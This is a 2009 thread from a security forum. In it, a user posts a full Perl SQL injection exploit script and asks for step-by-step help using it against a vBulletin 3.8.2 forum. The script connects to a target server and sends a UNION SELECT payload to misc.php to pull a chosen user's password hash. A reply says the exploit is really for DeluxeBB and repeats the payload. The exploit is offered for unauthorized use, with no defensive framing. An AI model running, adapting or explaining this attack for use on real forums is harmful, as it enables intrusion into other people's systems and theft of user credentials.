 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
[HELP]SQL Injection[HELP] |
 |
 Posted: Sun Aug 09, 2009 8:20 pm |
 |
|
| dune |
| Active user |
 |
|
| Joined: Jul 05, 2009 |
| Posts: 26 |
|
|
|
 |
|
 |
|
Basically I want to perform a SQL Injection on a 3.8.2 vBulletin forums, I want to use the following method to do this:
| Code: | #!/usr/bin/perl
use IO::Socket;
print q{
######################################################
# DeluxeBB Remote SQL Injection Exploit #
# vbulletin Remote SQL Injection Exploit #
# // SekoMirza // Turkish Hackerz #
######################################################
};
if (!$ARGV[2]) {
print q{
Usage: perl dbbxpl.pl host /directory/ victim_userid
perl dbbxpl.pl www.somesite.com /forum/ 1
};
}
$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
print "-----------------------------------------------------------------------
-------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "-----------------------------------------------------------------------
-------------------------\r\n\r\n";
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .=
"misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%
20WHERE%20(uid='".$user ;
print "[~] PREPARE TO CONNECT...\r\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";
print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";
print "--[ REPORT ]-----------------------------------------------------------------------
-------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "Password Hash is: ".$1."\r\n";
print "-----------------------------------------------------------------------
---------------\r\n";
}
exit();
}
}
print "-----------------------------------------------------------------------
-------------------------\r\n";
#########################################################
#Shoutz: #
# #
# My Sweet -> Caramel #
# For Mp3s -> Hypn0sis #
# For Support -> [WwW.StarHack.Org] #
# My Bro -> PhantomOrchid #
# My Preceptor -> Earnk Kazno #
######################################################### |
Can somebody please give me a step by step guide on how to perform this action? I am clueless. |
|
|
|
|
|
|
|
|
| Posted: Sun Aug 09, 2009 9:26 pm |
|
|
| capt |
| Advanced user |
 |
|
| Joined: Nov 04, 2008 |
| Posts: 232 |
|
|
|
|
|
|
|
This is not a vBulletin Exploit. Why do so many people think this is a vBulletin exploit. Are the skid turks advertizing it as a vBulletin exploit and selling it lawlz??
This is a simple public exploit made for deluxebb
| Code: |
"misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%
|
|
|
|
|
|
| Posted: Mon Aug 10, 2009 5:19 am |
|
|
| dune |
| Active user |
|
|
| Joined: Jul 05, 2009 |
| Posts: 26 |
|
|
|
|
|
|
|
| capt wrote: | This is not a vBulletin Exploit. Why do so many people think this is a vBulletin exploit. Are the skid turks advertizing it as a vBulletin exploit and selling it lawlz??
This is a simple public exploit made for deluxebb
| Code: |
"misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%
|
|
well for some reason it worked for this guy? http://www.waraxe.us/ftopict-5371.html |
|
|
|
|
www.waraxe.us Forum Index -> General discussion
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 94
Members: 0
Total: 94
